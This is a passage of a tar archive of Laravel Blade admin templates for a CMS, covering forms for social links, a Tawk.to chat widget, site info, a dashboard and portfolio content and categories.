? 'selected' : '' }}>Pinterest</option> <option value="fab fa-dribbble" {{ $social->social_media === "fab fa-dribbble" ? 'selected' : '' }}>Dribbble</option> <option value="fab fa-linkedin-in" {{ $social->social_media === "fab fa-linkedin-in" ? 'selected' : '' }}>Linkedin</option> <option value="fab fa-behance-square" {{ $social->social_media === "fab fa-behance-square" ? 'selected' : '' }}>Behance</option> <option value="fab fa-wordpress" {{ $social->social_media === "fab fa-wordpress" ? 'selected' : '' }}>WordPress</option> <option value="fab fa-blogger-b" {{ $social->social_media === "fab fa-blogger-b" ? 'selected' : '' }}>Blogger</option> <option value="fab fa-whatsapp" {{ $social->social_media === "fab fa-whatsapp" ? 'selected' : '' }}>Whatsapp</option> <option value="fab fa-telegram" {{ $social->social_media === "fab fa-telegram" ? 'selected' : '' }}>Telegram</option> <option value="fab fa-skype" {{ $social->social_media === "fab fa-skype" ? 'selected' : '' }}>Skype</option> <option value="fab fa-amazon" {{ $social->social_media === "fab fa-amazon" ? 'selected' : '' }}>Amazon</option> <option value="fab fa-stack-overflow" {{ $social->social_media === "fab fa-stack-overflow" ? 'selected' : '' }}>Stack Overflow</option> <option value="fab fa-stack-exchange" {{ $social->social_media === "fab fa-stack-exchange" ? 'selected' : '' }}>Stack Exchange</option> <option value="fab fa-github" {{ $social->social_media === "fab fa-github" ? 'selected' : '' }}>Github</option> <option value="fab fa-android" {{ $social->social_media === "fab fa-android" ? 'selected' : '' }}>Android</option> <option value="fab fa-vimeo-v" {{ $social->social_media === "fab fa-vimeo-v" ? 'selected' : '' }}>Vimeo</option> <option value="fab fa-tumblr" {{ $social->social_media === "fab fa-tumblr" ? 'selected' : '' }}>Tumblr</option> <option value="fab fa-vine" {{ $social->social_media === "fab fa-vine" ? 'selected' : '' }}>Vine</option> <option value="fab fa-twitch" {{ $social->social_media === "fab fa-twitch" ? 'selected' : '' }}>Twitch</option> <option value="fab fa-flickr" {{ $social->social_media === "fab fa-flickr" ? 'selected' : '' }}>Flickr</option> <option value="fab fa-yahoo" {{ $social->social_media === "fab fa-yahoo" ? 'selected' : '' }}>Yahoo</option> <option value="fab fa-reddit" {{ $social->social_media === "fab fa-reddit" ? 'selected' : '' }}>Reddit</option> <option value="fas fa-rss" {{ $social->social_media === "fas fa-rs" ? 'selected' : '' }}>Rss</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }}</label> <input id="url" type="text" name="url" value="{{ $social->url }}" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $social->status === 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $social->status === 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/tawk_to/create.blade.php��������������������������������������������������������0000644�����������������00000010214�14765366573�0015164 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.tawk_to') }}</h4> @if (isset($tawk_to)) <form action="{{ route('tawk-to.update', $tawk_to->id) }}" method="POST"> @method('PUT') @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="tawk_to">{{ __('content.tawk_to') }} </label> <textarea name="tawk_to" class="form-control" id="tawk_to" rows="10">@php echo html_entity_decode($tawk_to->tawk_to); @endphp</textarea> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#tawkToDestroyModal{{ $tawk_to->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="tawkToDestroyModal{{ $tawk_to->id }}" tabindex="-1" role="dialog" aria-labelledby="tawkToDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="googleAnalyticDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('tawk-to.destroy', $tawk_to->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else <form action="{{ route('tawk-to.store') }}" method="POST"> @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="tawk_to">{{ __('content.tawk_to') }}</label> <textarea name="tawk_to" class="form-control" id="tawk_to" rows="10"></textarea> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/site_info/create.blade.php������������������������������������������������������0000644�����������������00000024505�14765366573�0015503 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.site_info') }}</h4> @if (isset($site_info)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('site-info.update', $site_info->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description" value="{{ $site_info->description }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="copyright">{{ __('content.copyright') }}</label> <input type="text" name="copyright" class="form-control" id="copyright" value="{{ $site_info->copyright }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'copyright')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'copyright')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'copyright')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'copyright')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'copyright')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'copyright')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#siteInfoDestroyModal{{ $site_info->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="siteInfoDestroyModal{{ $site_info->id }}" tabindex="-1" role="dialog" aria-labelledby="siteInfoDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="siteInfoDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('site-info.destroy', $site_info->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('site-info.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="copyright">{{ __('content.copyright') }}</label> <input type="text" name="copyright" class="form-control" id="copyright"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'copyright')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'copyright')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'copyright')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'copyright')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'copyright')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'copyright')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/dashboard.blade.php���������������������������������������������������������������������0000644�����������������00000011545�14765366573�0012533 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 col-sm-6 col-xl"> <!-- Card --> <div class="card box-margin"> <div class="card-body"> <div class="row align-items-center"> <div class="col"> <!-- Title --> <h6 class="text-uppercase font-14">{{ __('content.blogs') }}</h6> <!-- Heading --> <span class="font-24 text-dark mb-0"> @if ($blogs_count == 0) 0 @else {{ $blogs_count }} @endif </span> </div> <div class="col-auto"> <!-- Icon --> <div class="icon"> <i class="fab fa-blogger-b font-46 text-primary"></i> </div> </div> </div> </div> </div> </div> <div class="col-12 col-sm-6 col-xl"> <!-- Card --> <div class="card box-margin"> <div class="card-body"> <div class="row align-items-center"> <div class="col"> <!-- Title --> <h6 class="font-14 text-uppercase"> {{ __('content.page_builder') }} </h6> <!-- Heading --> <a href="{{ url('admin/page-builder/create') }}"> <span class="font-24 text-dark mb-0"> {{ __('content.pages') }} </span> </a> </div> <div class="col-auto"> <!-- Icon --> <div class="icon"> <i class="fas fa-puzzle-piece font-46 text-success"></i> </div> </div> </div> </div> </div> </div> <div class="col-12 col-sm-6 col-xl"> <!-- Card --> <div class="card box-margin"> <div class="card-body"> <div class="row align-items-center"> <div class="col"> <!-- Title --> <h6 class="font-14 text-uppercase"> {{ __('content.color_option') }} </h6> <!-- Heading --> <a href="{{ url('admin/color-option/create') }}"> <span class="font-24 text-dark"> {{ __('content.show') }} </span> </a> </div> <div class="col-auto"> <!-- Icon --> <div class="icon"> <i class="fas fa-palette font-46 text-red"></i> </div> </div> </div> </div> </div> </div> <div class="col-12 col-sm-6 col-xl"> <!-- Card --> <div class="card box-margin"> <div class="card-body"> <div class="row align-items-center"> <div class="col"> <!-- Title --> <h6 class="font-14 text-uppercase"> {{ __('content.languages') }} </h6> <div class="row align-items-center no-gutters"> <div class="col-auto"> <!-- Heading --> <a href="{{ url('admin/language/create') }}"> <span class="font-24 text-dark mr-2"> {{ __('content.show') }} </span> </a> </div> </div> </div> <div class="col-auto"> <!-- Icon --> <div class="icon"> <i class="fas fa-language font-46 text-warning"></i> </div> </div> </div> </div> </div> </div> </div> <!-- / .row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/create.blade.php��������������������������������������������������������������0000644�����������������00000013107�14765366573�0014060 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_portfolio') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/portfolio-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach($categories as $category) <option value="{{$category->id}}">{{$category->category_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.thumbnail') }} ({{ __('content.size') }} 600 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input id="section_image" name="section_image" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="url">{{ __('content.url') }} </label> <input id="url" name="url" type="text" class="form-control"> <small class="form-text text-muted">{{ __('content.when_you_leave_this_section_blank_it_will_go_to_its_own_detail_page') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/content/create.blade.php������������������������������������������������������0000644�����������������00000052016�14765366573�0015534 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.portfolio_content') }}</h4> @if (isset($portfolio_content)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-content.update', $portfolio_content->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea type="text" name="description" class="form-control" id="summernote">@php echo html_entity_decode($portfolio_content->description); @endphp</textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="title" name="meta_description" type="text" class="form-control" value="{{ $portfolio_content->meta_description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control">{{ $portfolio_content->meta_keyword }}</textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.please_use_recommended_sizes') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes" {{ $portfolio_content->breadcrumb_status == 'yes' ? 'selected' : '' }}>{{ __('content.yes') }}</option> <option value="no" {{ $portfolio_content->breadcrumb_status == 'no' ? 'selected' : '' }}>{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.recommended_size') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($portfolio_content->custom_breadcrumb_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/portfolio/breadcrumb/'.$portfolio_content->custom_breadcrumb_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#portfolioContentDestroyModal{{ $portfolio_content->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="portfolioContentDestroyModal{{ $portfolio_content->id }}" tabindex="-1" role="dialog" aria-labelledby="portfolioContentDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="portfolioContentDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('portfolio-content.destroy', $portfolio_content->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-content.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea id="summernote" name="description" class="form-control"></textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control"></textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes">{{ __('content.yes') }}</option> <option value="no">{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary col-12">{{ __('content.submit') }}</button> </div> </div> </div> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/category/create.blade.php�����������������������������������������������������0000644�����������������00000027254�14765366573�0015705 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.categories') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#categoryModal">+ {{ __('content.add_category') }}</button> </div> </div> @if (count($categories) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('portfolio-category.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($categories); $asc=0; @endphp @foreach ($categories as $category) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $category->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $category->category_name }}</td> <td>{{ $category->order }}</td> <td> @if($category->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('portfolio-category.edit', $category->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $category->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $category->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('portfolio-category.destroy', $category->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="categoryModal" tabindex="-1" role="dialog" aria-labelledby="categoryModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="categoryModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-category.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection 